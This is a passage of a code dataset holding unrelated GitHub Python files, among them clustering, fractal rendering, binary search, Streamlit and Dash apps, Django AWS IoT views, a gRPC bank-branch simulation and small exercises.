m_label + '.model'\n neighbors = joblib.load(outputfile)\n distances, indices = neighbors.kneighbors(f_matrix[root])\n root_neighbors.append(indices)\n root_neighbor_weights.append(distances)\n\n return np.asarray(root_vector_indices), np.asarray(root_neighbors), np.asarray(root_neighbor_weights)\n\ndef fit_transform_graphData(song_matrices, matrix_labels):\n\n root_vector_indices = []\n root_neighbors = []\n root_neighbor_weights = []\n\n for f_matrix, m_label in zip(song_matrices, matrix_labels):\n print(m_label)\n clustering = MeanShift(n_jobs=-1) # init MeanShift clustering model\n outputfile = 'models/meanshift_' + m_label + '.model'\n\n start = time.time()\n # Perform Mean-Shift Clustering\n clustering.fit(f_matrix)\n joblib.dump(clustering, outputfile) # Save MeanShift-clustering model\n\n cluster_centers = clustering.cluster_centers_\n n_clusters = len(cluster_centers)\n end = time.time()\n print('Clustered in', ((end - start) / 60), 'minutes' if ((end - start) > 60) else ((end - start), 'seconds'), 'with ', n_clusters, 'clusters')\n\n # Save root vectors\n root_indices = []\n # returns list of 'labels' corresponding to the song index in the lib array\n for center in cluster_centers:\n roots, _ = pairwise_distances_argmin_min([center], f_matrix)\n root_indices.append(roots)\n\n root_vector_indices.append(root_indices)\n num_samples = f_matrix.shape[0]\n num_neighbors = int((num_samples / 3))\n print('number of neighbors per root:', num_neighbors)\n\n # given list of roots, perform knn on each one to get neighboring nodes\n for root in root_indices:\n neighbors = NearestNeighbors(n_neighbors=num_neighbors, algorithm='auto', n_jobs=-1)\n neighbors.fit(f_matrix)\n\n outputfile = 'models/knn_' + m_label + '.model'\n joblib.dump(neighbors, outputfile) # Save k-Nearest Neighbors model\n\n distances, indices = neighbors.kneighbors(f_matrix[root])\n root_neighbors.append(indices)\n root_neighbor_weights.append(distances)\n\n return np.asarray(root_vector_indices), np.asarray(root_neighbors), np.asarray(root_neighbor_weights)\n\n\ndef checkSavedMatrices():\n temp_bool = False\n\n if os.path.isfile(root_indices_dir) and os.path.isfile(root_neighbors_dir) and os.path.isfile(neighbor_weights_dir):\n temp_bool = True\n\n return temp_bool\n","repo_name":"aymanzay/pyCosmos","sub_path":"schema_functions.py","file_name":"schema_functions.py","file_ext":"py","file_size_in_byte":7765,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"38038387555","text":"import numpy as np\nfrom PIL import Image, ImageDraw\nimport time\n\nfrom . 
import api\n\nROOT3 = np.sqrt(3)\n\n\n@api(mode=\"final\")\nclass IFS:\n \"\"\"\n Iterated function system\n \"\"\"\n \n def __init__(self, *maps, dimension=2):\n self.maps = maps\n self.dimension = dimension\n \n def __getitem__(self, item):\n return self.maps[item]\n \n def __call__(self, *points):\n return [tuple(m(point) for point in points)\n for m in self.maps]\n \n def apply(self, *figures):\n \"\"\"\n Apply the map to figures, which consists of a tuple of\n points defining the vertices of a the figure.\n \"\"\"\n return [f for fig in figures for f in self(*fig)]\n \n def iterate(self, figure, iterations):\n \"\"\"\n Apply the IFS iteratively to a figure.\n \"\"\"\n temp = [figure]\n last_time = time.time()\n for i in range(iterations):\n temp = self.apply(*temp)\n print(f\"Applied iteration {i}\",\n f\"in {time.time() - last_time} seconds\",\n f\"({len(temp)} points)\"\n )\n return temp\n \n def __repr__(self):\n return f\"IFS({', '.join(map(lambda m: m.__name__, self.maps))})\"\n \n def render(self, initial_figure, iterations=1, window=(480, 270), file=None):\n \"\"\"\n Render the result of the ifs applied iteratively to an initial\n figure.\n \"\"\"\n figures = self.iterate(initial_figure, iterations)\n \n image = Image.new(\"RGB\", window, \"#ffffff\")\n draw = ImageDraw.Draw(image)\n \n if self.dimension == 1:\n y = window[1] // 2\n sf = window[0]\n for fig in figures:\n pts = list(map(lambda x: (sf * x, y), fig))\n draw.polygon(pts, fill=0)\n elif self.dimension == 2:\n xsf, ysf = window\n for fig in figures:\n pts = list(map(lambda p: (xsf*p[0], ysf*p[1]/ROOT3), fig))\n draw.polygon(pts, fill=\"#000000\")\n else:\n raise RuntimeError(\"Cannot plot higher dimensional fractals\")\n image.transpose(Image.FLIP_TOP_BOTTOM)\n if file is None:\n image.show()\n else:\n image.save(file, \"eps\")\n \n\n@api(mode=\"final\")\ndef cantor_middle_thirds(iterations=2, window=(480, 270), file=None):\n \"\"\"\n Render the Cantor Middle thirds set.\n\n :param iterations:\n :param window:\n :param file:\n :return:\n \"\"\"\n\n def map1(point):\n return point / 3\n \n def map2(point):\n return (point + 2) / 3\n ifs = IFS(map1, map2, dimension=1)\n ifs.render(\n (0.0, 1.0),\n iterations=iterations,\n window=window,\n file=file\n )\n\n\n@api(mode=\"final\")\ndef sierpinski_triangle(iterations=2, window=(480, 270), file=None):\n \"\"\"\n Render the Sierpinski triangle.\n\n :param iterations:\n :param window:\n :param file:\n :return:\n \"\"\"\n def map1(point):\n return point / 2\n \n def map2(point):\n return np.array([point[0] + 1, point[1]]) / 2\n \n def map3(point):\n return np.array([point[0] + 0.5, point[1] + ROOT3]) / 2\n\n ifs = IFS(map1, map2, map3, dimension=2)\n ifs.render(\n (np.array([0.0, 0.0]),\n np.array([1., 0.0]),\n np.array([.5, ROOT3])),\n iterations=iterations,\n window=window,\n file=file\n )\n","repo_name":"karant17/mathematics","sub_path":"mathematics/fractals/ifs.py","file_name":"ifs.py","file_ext":"py","file_size_in_byte":3537,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"10370809442","text":"import math\n\n\ndef binarysearch(arr, n, k):\n if arr is None:\n return\n\n if len(arr) != n:\n return -1\n\n n = n - 1\n\n # Do a bounds value check. 
This applies only if the array is sorted\n if k > arr[n] or k < arr[0]:\n return -1\n\n lbound = 0\n ubound = n\n mbound = math.ceil(n / 2)\n\n # def search(arr, search_val, lbound, ubound, mbound):\n # # print(\"Iterate\")\n # if search_val == arr[mbound]:\n # return mbound\n #\n # elif search_val < arr[mbound]:\n # if search_val == arr[lbound]:\n # return lbound\n # elif (mbound - lbound) == 1 and (ubound - mbound) == 1:\n # return -1\n # else:\n # new_lbound = lbound\n # new_ubound = mbound\n # new_mbound = new_lbound + math.ceil((new_ubound - new_lbound) / 2)\n # return search(arr, search_val, lbound=new_lbound, ubound=new_ubound, mbound=new_mbound)\n # elif search_val > arr[mbound]:\n # if search_val == arr[ubound]:\n # return ubound\n # elif (mbound - lbound) == 1 and (ubound - mbound) == 1:\n # return -1\n # else:\n # new_lbound = mbound\n # new_ubound = ubound\n # new_mbound = new_lbound + math.ceil((new_ubound - new_lbound) / 2)\n # return search(arr, search_val, lbound=new_lbound, ubound=new_ubound, mbound=new_mbound)\n\n # def search(arr, search_val, lbound, ubound):\n # # print(\"Iterate\")\n # mbound = lbound + math.ceil((ubound - lbound) / 2)\n #\n # if search_val == arr[mbound]:\n # return mbound\n # # elif (mbound - lbound) <= 1 and (ubound - mbound) <= 1:\n # # return -1\n # elif search_val < arr[mbound]:\n # return search(arr, search_val, lbound, mbound - 1)\n # elif search_val > arr[mbound]:\n # return search(arr, search_val, mbound+1, ubound)\n #\n search_val = k\n counter = 0\n max_val = math.log(n, 2)\n print(\"max iteration\" + str(max_val))\n while counter <= max_val:\n # print(\"Iterate\")\n mbound = lbound + math.ceil((ubound - lbound) / 2)\n\n if search_val == arr[mbound]:\n return mbound\n\n elif search_val < arr[mbound]:\n ubound = mbound - 1\n elif search_val > arr[mbound]:\n lbound = mbound + 1\n\n counter += 1\n\n return -1\n\n\n# arr = [5, 6, 7, 8, 9, 10, 11, 12, 13, 14]\narr = [10, 12, 13, 14, 15, 16, 17, 18, 19, 20]\n# arr = [1, 2, 3, 4, 5, 7]\nprint(binarysearch(arr, len(arr), 20))\n","repo_name":"tecmaverick/pylearn","sub_path":"src/43_algo/37_arr_binary_search.py","file_name":"37_arr_binary_search.py","file_ext":"py","file_size_in_byte":2638,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"10083280780","text":"import streamlit as st\nimport pandas\nfrom send_email import send_email\n\nst.title(\"Contact Us\")\n\ndf = pandas.read_csv(\"topics.csv\")\n\nwith st.form(key=\"email_form\"):\n user_email = st.text_input(\"Enter your email address\")\n topic = st.selectbox(\"What topic would you like to discuss?\", df['topic'])\n text = st.text_area(\"Your message\")\n message = f\"\"\"\\\nSubject: Message from Best Company Contact Us form\nFrom: {user_email}\n{topic}\n{text}\n\"\"\"\n\n button = st.form_submit_button(\"Submit\")\n if button:\n send_email(message)\n st.info(\"Your email has been sent successfully\")\n","repo_name":"daithileonard/app3-best-company-website","sub_path":"pages/Contact_Us.py","file_name":"Contact_Us.py","file_ext":"py","file_size_in_byte":597,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"172801683","text":"import dash\nimport dash_html_components as html\nimport dash_bootstrap_components as dbc\n\n# instantiate the app\napp = dash.Dash(__name__, external_stylesheets=[dbc.themes.DARKLY])\n\n# create app layout\napp.layout = html.Div(children=[\n html.H1(\"Poverty And Equity Database\",\n style={\n \"color\": 
\"green\",\n \"fontSize\": \"40px\"\n }\n ),\n html.H2(\"The World Bank\"),\n dbc.Tabs([\n dbc.Tab([\n html.Ul([\n html.Li(\"Number of Economies: 170\"), # list items within unordered list block\n html.Li(\"Temporal Coverage: 1974 - 2019\"),\n html.Li(\"Update Frequency: Quarterly\"),\n html.Li([\n \"Source:\",\n html.A('https://datacatalog.worldbank.org/dataset/poverty-and-equity-database',\n href='https://datacatalog.worldbank.org/dataset/poverty-and-equity-database')\n ])\n ])\n ], label=\"Key Facts\"),\n\n dbc.Tab([\n html.Ul([\n html.Br(),\n html.Li(\"Book title: Interactive Dashboards and Data Apps with Plotly and Dash\"),\n html.Li([\n \"Github repo:\",\n html.A('https://github.com/PacktPublishing/Interactive-Dashboards-and-Data-Apps-with-Plotly-and-Dash',\n href='https://github.com/PacktPublishing/Interactive-Dashboards-and-Data-Apps-with-Plotly-and-Dash')])\n ])\n ], label=\"Project Info\")\n ])\n])\n\n# run app\nif __name__ == \"__main__\":\n app.run_server(debug=True)\n","repo_name":"hamemuh/plotly-dash","sub_path":"1 - Dash Overview/tabs.py","file_name":"tabs.py","file_ext":"py","file_size_in_byte":1610,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"72116221920","text":"def add_time(start, duration, day=\"None\"):\n days = [\"Monday\", \"Tuesday\", \"Wednesday\", \"Thursday\", \"Friday\", \"Saturday\", \"Sunday\"]\n start = start.split(\" \")\n hour = int(start[0].split(\":\")[0])\n minute = int(start[0].split(\":\")[1])\n dhour = int(duration.split(\":\")[0])\n dminute = int(duration.split(\":\")[1])\n\n minute = minute + dminute\n hour = hour + dhour + (minute // 60)\n minute = minute % 60\n\n dhour = hour // 12\n hour = hour % 12\n\n\n if minute<10:\n minute = str(minute)\n minute = minute.zfill(2)\n dhour = (\"PM\" == start[1].strip()) + dhour\n\n if hour == 0:\n hour = 12 \n\n new_time = f\"{hour}:{minute} {'AM' * (dhour % 2 == 0) + 'PM' * (dhour % 2 == 1)}\"\n if day != \"None\":\n new_time = new_time + \", \"+days[(days.index(day.strip().capitalize())+dhour//2)%7]\n\n if dhour//2 >1:\n new_time = new_time + f\" ({dhour // 2} days later)\"\n elif dhour//2 ==1:\n new_time = new_time + \" (next day)\"\n\n return new_time","repo_name":"LuisEmanuelDias/FreeCodeCamp","sub_path":"boilerplate-time-calculator-2/time_calculator.py","file_name":"time_calculator.py","file_ext":"py","file_size_in_byte":952,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"42991705136","text":"# This file is part of Pebble.\n\n# Pebble is free software: you can redistribute it and/or modify\n# it under the terms of the GNU Lesser General Public License\n# as published by the Free Software Foundation,\n# either version 3 of the License, or (at your option) any later version.\n\n# Pebble is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU Lesser General Public License for more details.\n\n# You should have received a copy of the GNU Lesser General Public License\n# along with Pebble. 
If not, see .\n\nimport os\nimport sys\n\nfrom select import select\nfrom functools import wraps\nfrom traceback import format_exc\ntry: # Python 2\n from cPickle import PicklingError\nexcept: # Python 3\n from pickle import PicklingError\nif os.name in ('posix', 'os2'):\n from signal import SIGKILL\n\nfrom pebble.exceptions import TimeoutError, ProcessExpired\n\n\n_registered_functions = {}\n\n\ndef stop(worker):\n \"\"\"Does its best to stop the worker.\"\"\"\n worker.terminate()\n worker.join(3)\n\n if worker.is_alive() and os.name != 'nt':\n try:\n os.kill(worker.pid, SIGKILL)\n worker.join()\n except OSError:\n return\n\n if worker.is_alive():\n raise RuntimeError(\"Unable to terminate PID %d\" % os.getpid())\n\n\ndef get_results(pipe, timeout):\n \"\"\"Waits for results and handles communication errors.\"\"\"\n try:\n if poll(pipe, timeout):\n return pipe.recv()\n else:\n return TimeoutError('Task Timeout', timeout)\n except (EnvironmentError, EOFError):\n return ProcessExpired('Abnormal termination')\n except Exception as error:\n return error\n\n\ndef poll(pipe, timeout):\n \"\"\"Python's Pipe.poll blocks undefinitely if data is too big.\"\"\"\n if os.name != 'nt':\n return select([pipe], [], [], timeout)[0] and True or False\n else:\n return pipe.poll(timeout)\n\n\ndef send_results(pipe, data):\n \"\"\"Send results and handles communication errors.\"\"\"\n try:\n pipe.send(data)\n except PicklingError as error:\n error.traceback = format_exc()\n pipe.send(error)\n\n\ndef decorate(function, launcher, **properties):\n \"\"\"Decorates the given function\n taking care of Windows process decoration issues.\n\n *function* represent the target function to be decorated,\n *launcher* takes care of executing the function with the\n given decoration *properties*.\n\n \"\"\"\n if os.name == 'nt':\n register_function(function)\n\n @wraps(function)\n def wrapper(*args, **kwargs):\n if os.name == 'nt':\n target, args = dump_function(function, args)\n else:\n target = function\n\n return launcher(target, args=args, kwargs=kwargs, **properties)\n\n return wrapper\n\n\ndef register_function(function):\n global _registered_functions\n\n _registered_functions[function.__name__] = function\n\n\ndef dump_function(function, args):\n \"\"\"Dumps a decorated function.\"\"\"\n args = [function.__name__, function.__module__] + list(args)\n\n return trampoline, args\n\n\ndef trampoline(name, module, *args, **kwargs):\n \"\"\"Trampoline function for decorators.\n\n Lookups the function between the registered ones;\n if not found, forces its registering and then executes it.\n\n \"\"\"\n function = function_lookup(name, module)\n return function(*args, **kwargs)\n\n\ndef function_lookup(name, module):\n \"\"\"Searches the function between the registered ones.\n If not found, it imports the module forcing its registration.\n\n \"\"\"\n try:\n return _registered_functions[name]\n except KeyError: # force function registering\n __import__(module)\n mod = sys.modules[module]\n getattr(mod, name)\n\n return _registered_functions[name]\n","repo_name":"Alidron/demo-nao","sub_path":"alidron-env/lib/python2.7/site-packages/pebble/process/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3900,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"14987774862","text":"from typing import List \n\ndef productExceptSelf(nums: List[int]) -> List[int]:\n n = len(nums)\n result = [1 for _ in range(n)]\n for i in range(1, n):\n result[i] = result[i - 1] 
* nums[i - 1]\n factor = 1\n for i in range(-1, -n - 1, -1):\n result[i] *= factor \n factor *= nums[i]\n return result ","repo_name":"qj/lc","sub_path":"238.py","file_name":"238.py","file_ext":"py","file_size_in_byte":330,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"12649258395","text":"import pandas as pd\r\nimport numpy as np\r\nfrom pandas import Series,DataFrame\r\n\r\nfrom io import StringIO\r\n\r\ndata=\"\"\"\\\r\nSample Animal Intelligence\r\n1 Dog Smart\r\n2 Dog Smart\r\n3 Cat Dumb\r\n4 Cat Dumb\r\n5 Dog Dumb\r\n6 Cat Smart\"\"\"\r\n\r\ndframe=pd.read_table(StringIO(data),sep=\"\\s+\")\r\n\r\nprint(dframe)\r\nprint(\"=\"*50)\r\n\r\n\r\npd.crosstab(dframe.Animal,dframe.Intelligence,margins=True)\r\n","repo_name":"brandle26/Learning","sub_path":"Section 7 - Wokrking with data part 3/Lec 46 - Cross Tabulation/Cross_Tabulation.py","file_name":"Cross_Tabulation.py","file_ext":"py","file_size_in_byte":371,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"14200694380","text":"from defs import *\nfrom base_creep import BaseCreep\n\n__pragma__('noalias', 'name')\n__pragma__('noalias', 'undefined')\n__pragma__('noalias', 'Infinity')\n__pragma__('noalias', 'keys')\n__pragma__('noalias', 'get')\n__pragma__('noalias', 'set')\n__pragma__('noalias', 'type')\n__pragma__('noalias', 'update')\n\n\nclass Upgrader(BaseCreep):\n def __init__(self, creep):\n super().__init__(creep)\n\n def run_upgrader(self):\n \"\"\"\n Runs a creep as a generic harvester.\n :param creep: The creep to run\n \"\"\"\n self.set_filling()\n if self.creep.memory.filling:\n # If we have a source use it\n if self.creep.memory.source:\n source = Game.getObjectById(self.creep.memory.source)\n if not source:\n del self.creep.memory.source\n else:\n # Get location of the closest container or dropped resources.\n source = self.get_source(\"container\")\n if source:\n self.creep.memory.source = source.id\n else:\n source = self.get_source(\"dropped\")\n if source:\n self.creep.memory.source = source.id\n\n # If we're near the source, harvest it - otherwise, move to it.\n if self.creep.pos.isNearTo(source):\n self.collect_source(source)\n # result = self.creep.withdraw(source, RESOURCE_ENERGY)\n # if result != 0:\n # self.creep.pickup(source)\n else:\n self.creep.moveTo(source)\n else:\n # If we have a saved target, use it\n if self.creep.memory.target:\n target = Game.getObjectById(self.creep.memory.target)\n else:\n target = self.get_target(\"controller\")\n if target:\n self.creep.memory.target = target.id\n\n # If we are targeting a spawn or extension, we need to be directly next to it - otherwise, we can be 3 away.\n is_close = self.creep.pos.inRangeTo(target, 3)\n\n if is_close:\n # If we are targeting a spawn or extension, transfer energy. 
Otherwise, use upgradeController on it.\n result = self.creep.upgradeController(target)\n if result != OK:\n print(\"[{}] Unknown result from creep.upgradeController({}): {}\".format(\n self.creep.name, target, result))\n # Let the creeps get a little closer than required to the controller, to make room for other creeps.\n # if not self.creep.pos.inRangeTo(target, 2):\n # self.creep.moveTo(target)\n else:\n self.creep.moveTo(target)\n","repo_name":"stove41/screeps","sub_path":"src/upgrader.py","file_name":"upgrader.py","file_ext":"py","file_size_in_byte":2800,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"28197608978","text":"# Gabriel Diniz Gisoldo RA: 22214007-1\nclass AnalisadorSintatico(object):\n \"\"\"Analisador sintatico.\"\"\"\n\n def __init__(self, string, idx=0):\n self.string = string\n self.idx = idx\n self.pilha = 0\n\n def print_log(self):\n \"\"\".\"\"\"\n print(vars(self))\n\n def up_index(self):\n \"\"\".\"\"\"\n self.idx += 1\n\n def eh_simbolo(self):\n \"\"\".\"\"\"\n return self.string[self.idx] in ['+', '-', '*', '/', '=']\n\n def fim_string(self):\n \"\"\".\"\"\"\n return self.idx == len(self.string)\n\n def rejeita(self):\n \"\"\".\"\"\"\n raise Exception('REJEITA')\n\n def start(self):\n \"\"\".\"\"\"\n self.e0()\n\n def e0(self):\n \"\"\".\"\"\"\n # self.print_log()\n if self.fim_string():\n self.rejeita()\n elif self.string[self.idx] == 'N':\n self.up_index()\n self.e1()\n elif self.string[self.idx] == 'I':\n self.up_index()\n self.e1()\n elif self.string[self.idx] == '(':\n self.up_index()\n self.e2()\n else:\n self.rejeita()\n\n def e1(self):\n \"\"\".\"\"\"\n # self.print_log()\n if self.pilha == 0:\n if self.fim_string():\n print(\"ACEITO\")\n elif self.eh_simbolo():\n self.up_index()\n self.e0()\n else:\n self.rejeita()\n else:\n if self.fim_string():\n self.rejeita()\n elif self.eh_simbolo():\n self.up_index()\n self.e0()\n elif self.string[self.idx] == ')':\n return\n else:\n self.rejeita()\n\n def e2(self):\n \"\"\".\"\"\"\n # self.print_log()\n if self.fim_string():\n self.rejeita()\n else:\n self.pilha += 1\n self.e0()\n self.pilha -= 1\n self.e3()\n\n def e3(self):\n \"\"\".\"\"\"\n if self.fim_string():\n self.rejeita()\n elif self.string[self.idx] == ')':\n self.up_index()\n self.e1()\n else:\n self.rejeita()\n","repo_name":"huine/compiladores","sub_path":"analisador_sintatico.py","file_name":"analisador_sintatico.py","file_ext":"py","file_size_in_byte":2168,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"23485406851","text":"from datetime import datetime\nimport hashlib\nimport json\nimport os\n\nimport boto3\n\nimport env_vars\n\nfrom django.shortcuts import render, redirect, reverse\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib import auth\nfrom django.forms.models import model_to_dict\nfrom django.contrib import messages\n\nfrom things.models import Thing, ThingRule\nfrom dashboard.models import Record\n\nfrom .aws_iot import (list_things, create_thing, create_credentials,\n create_policy, attach_policy, create_thing_name,\n delete_policy, delete_certificate, deactivate_certificate,\n delete_iot_thing, create_iot_rule)\n\nfrom .helper import add_to_zip, delete_from_s3\n\nACCESS_KEY = os.environ.get('S3_ACCESS_KEY', 'No value set')\nSECRET_KEY = os.environ.get('S3_SECRET_KEY', 'No value set')\n\n@login_required(redirect_field_name=None, login_url='/')\ndef things(request):\n things = 
Thing.objects.filter(user=request.user).all()\n rules_set = {}\n for thing in things:\n rules_set.setdefault(thing.thing_name, [])\n for rule in thing.rules.all().values():\n rules_set[thing.thing_name].append(rule)\n print(rules_set)\n return render(request, 'things.html', {'things': things.values(), 'rules': rules_set})\n\n\n@login_required(redirect_field_name=None, login_url='/')\ndef add_thing(request):\n things = Thing.objects.all().filter(user=request.user)\n if things.count() > 4:\n messages.error(request, 'You already have four things, please delete or updgrade your account.')\n return redirect(reverse('things_index'))\n\n display_name = request.POST.get('display_name')\n if not display_name:\n return redirect(reverse('things_index'))\n #try:\n thing_name = create_thing_name(display_name)\n thing = json.loads(create_thing(thing_name))\n policy = json.loads(create_policy(thing_name))\n credentials = json.loads(create_credentials())\n #credentials = {'certificatePem':'', 'keyPair': {'PrivateKey': ''}}\n zip_file_url = add_to_zip(credentials, thing_name, request.user.username)\n attached_policy = attach_policy(policy.get('policyName'), \n credentials.get('certificateArn'))\n thing = Thing.objects.create(\n display_name=display_name,\n thing_name=thing_name,\n user=request.user,\n policy_name=policy.get('policyName'),\n certificate_arn=credentials.get('certificateArn'),\n credentials_url=zip_file_url\n )\n return redirect(reverse('things_index'))\n\n\n@login_required(redirect_field_name=None, login_url='/')\ndef delete_thing(request):\n print(request.POST.get('thing_id'))\n thing = Thing.objects.get(thing_name=request.POST.get('thing_id'))\n print(1)\n deactivated_certificate = deactivate_certificate(thing.certificate_arn)\n print(2.1)\n deleted_certificate = delete_certificate(thing.certificate_arn)\n print(2.2)\n deleted_policy = delete_policy(thing.policy_name)\n print(3)\n deleted_thing = delete_iot_thing(thing.thing_name)\n print(4)\n deleted_s3_file = delete_from_s3(thing.thing_name)\n print(5)\n thing.delete()\n messages.success(request, 'Thing deleted successfully.')\n return redirect(reverse('things_index'))\n\n\n@login_required(redirect_field_name=None, login_url='/')\ndef add_topic_rule(request):\n context = \"\"\n thing_name = request.POST.get('thing_id')\n print(thing_name)\n rule_action = request.POST.get('rule_action')\n measure = request.POST.get('rule_measure')\n operator = request.POST.get('rule_operator')\n val = request.POST.get('rule_value')\n rule_params = \"%s %s %s\" % (measure, operator, val)\n thing = Thing.objects.get(thing_name=request.POST.get('thing_id'))\n rules = thing.rules.all()\n print(rules)\n rule_num = rules.count()+1\n\n if rule_num < 4:\n topic_rule = create_iot_rule(thing_name, rule_action, rule_params, str(rule_num)) \n rule = ThingRule.objects.create(thing=thing, rule=rule_params, action=rule_action)\n thing.rules.add(rule)\n else:\n messages.error(request, \"You alreay have 3 topic rules. 
Please upgrade your subscription or delete some of your rules to add a new rule.\")\n\n return redirect(reverse('things_index'))\n\n@login_required(redirect_field_name=None, login_url='/')\ndef change_status(request):\n thing_name = request.POST.get('thing_id')\n thing = Thing.objects.get(thing_name=thing_name)\n\n client = boto3.client('iot-data', region_name='eu-west-1', \n aws_access_key_id=ACCESS_KEY,\n aws_secret_access_key=SECRET_KEY)\n \n payload = {\n \"state\" : {\n \"desired\" : {\n 'type':'listen',\n 'publishing': (not thing.turned_on)\n },\n \"reported\" : {\n 'type':'listen',\n 'publishing': (not thing.turned_on)\n }\n }\n }\n\n \n response = client.publish(\n topic='$aws/things/%s/shadow/update/accepted' % thing_name,\n qos=1,\n payload=json.dumps(payload)\n )\n thing.turned_on = (not thing.turned_on)\n thing.save()\n return redirect(reverse('things_index'))\n","repo_name":"stefdworschak/iot_plant_irrigation","sub_path":"iot_irrigation/things/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5229,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"11694378213","text":"import example_pb2\nimport example_pb2_grpc\nimport ast\nfrom concurrent import futures\nimport os\nimport json\nimport grpc\nimport time\nimport multiprocessing\nimport shutil\n\nclass Branch(example_pb2_grpc.RPCServicer):\n\n def __init__(self, id, balance, branches):\n # unique ID of the Branch\n self.id = id\n # replica of the Branch's balance\n self.balance = balance\n # the list of process IDs of the branches\n self.branches = branches\n # the list of id of other branches\n self.others = self.branches\n self.others.pop((self.id-1))\n # A list to carry the message recieved from Customer\n self.events = list()\n # customer id\n self.cust = 0\n # Writeset for enforcing client-centric consistency\n self.writeset = 0\n\n\n\n\n # This method accepts the request from Customer and generates what has to be added to the existing balance.\n # The variable known as self.money carries this amount that will be added to the balance.\n # If the request is a deposit, then self.money is assigned the money amount to be deposited.\n # If the request is a withrawal, self.money is assigned a negative value of the money amounth to be withdrawn.\n # Else self.money is assigned 0. 
\n # Note that for easy of implementaion, query is regarded also as a deposit of $0\n def eventRequestExecute (self, x):\n self.events = (ast.literal_eval(x))\n self.cust = int(self.events[0])\n if self.events[1][\"interface\"] == 'withdraw':\n self.money = 0 - int(self.events[1][\"money\"]) \n elif self.events[1][\"interface\"] == 'deposit':\n self.money = int(self.events[1][\"money\"])\n else:\n self.money = 0\n self.writeset = self.events[2]\n self.workingWriteset = self.events[2]\n\n\n\n # This method handles the events in a branch that recieves a propagated message\n # The propagated message is the amount carried by variable self.money from the propagating branch as well as the writeset of \n # This variable is the amount which could be positive (deposit) or negative (withdrawal) is added to the balance of the receiving branch\n # Also the writeset is increased by 1 to allow the relevant branch execute writset based event.\n # This result in a propagation of writes and writesets \n def ClockUpdate(self, request, context):\n rcast = ast.literal_eval(request.propout)\n self.balance += int(rcast[0])\n self.writeset = int(rcast[1]) + 1\n return example_pb2.ExamplePropIn(propin=str(\"done\"))\n \n\n # This method handles the propagation of self.money (amount to be deposited or withdrawn) to other branches aside self. \n # The propagating Branch send a message, awaits for the other Branches to recieve the messages and acknowledge reciept.\n # Then it updates it's own branch's balance.\n def propagateRequest(self):\n for x in self.others:\n sendit = str([self.money, self.writeset])\n trans_spec = 50047 + x\n clockit = sendit\n with grpc.insecure_channel('localhost:' + str(trans_spec)) as channel:\n stub = example_pb2_grpc.RPCStub(channel)\n response = stub.ClockUpdate(example_pb2.ExamplePropOut(propout=clockit))\n self.writeset += 1\n self.balance += self.money\n \n \n\n # This method puts it all together. It ensures that request from the client is appropriately executed \n # the right message returned back to the Customer\n # This method also enforces client centric consistencies using the writeset, while lool and time.sleep\n # If the writeset and the incoming message writeset from the customer is not the same, the branch waits for 0.1 seconds and check again. \n # Once the message writeset is same with the branch writeset, the execution will now proceed. In essence the first writeset to be excuted and propagated is 0. \n # Other event of the same process will wait until the increment is made to 1 and then writeset 1 can be able to execute. 
\n # This continues until executions are done.\n def MsgDelivery(self,request, context):\n checkevent = (ast.literal_eval(request.inmessage))\n while int(checkevent[2]) != int(self.writeset):\n time.sleep(0.1)\n response = example_pb2.ExampleReply()\n self.eventRequestExecute(request.inmessage)\n self.propagateRequest()\n response.outmessage = str([{\"id\": self.cust, \"balance\": self.balance, \"writeset\": self.workingWriteset}])\n return response\n\n# This function ensures the servers are actively listening to the appropriate ports.\ndef creatServer(id, balance, branches):\n server = grpc.server(futures.ThreadPoolExecutor(max_workers=10))\n example_pb2_grpc.add_RPCServicer_to_server(Branch(id, balance, branches), server)\n trans_spec = 50047 + int(id)\n server.add_insecure_port('[::]:'+ str(trans_spec))\n server.start()\n server.wait_for_termination()\n\n\n\nif __name__ == \"__main__\":\n lock = multiprocessing.Lock()\n # Reading of input file\n with open(\"input.json\") as example_file:\n example_data = json.load(example_file)\n branches = []\n for i in range(len(example_data)):\n if example_data[i]['type'] == 'bank':\n branches.append(int(example_data[i]['id']))\n # this ensures multiprocessing is executed.\n processes = []\n for i in range(len(example_data)):\n if example_data[i]['type'] == 'bank':\n p1 = multiprocessing.Process(target=creatServer, args=(int(example_data[i]['id']), int(example_data[i]['balance']), branches))\n processes.append(p1)\n p1.start()\n for p1 in processes:\n p1.join()","repo_name":"ohuajo/Client-Centric-Consistency","sub_path":"Branch.py","file_name":"Branch.py","file_ext":"py","file_size_in_byte":5787,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"14182305541","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport cv2 as cv\nimport sys\n\n# a) Read Image, 5x5 Box Filter, Plot\ndef a():\n an_image = plt.imread('C:/Users/pk/Dropbox/Master/MMI/2. Semester/Bildverarbeitung/Aufgaben/2/test2.jpg');\n filtered = cv.filter2D(an_image, -1, np.ones((5,5))*1/25)\n plt.subplot(1,2,1)\n plt.imshow(an_image)\n plt.subplot(1,2,2)\n plt.imshow(filtered)\n plt.show()\n\n\n# b) \ndef b(centerIncrease):\n 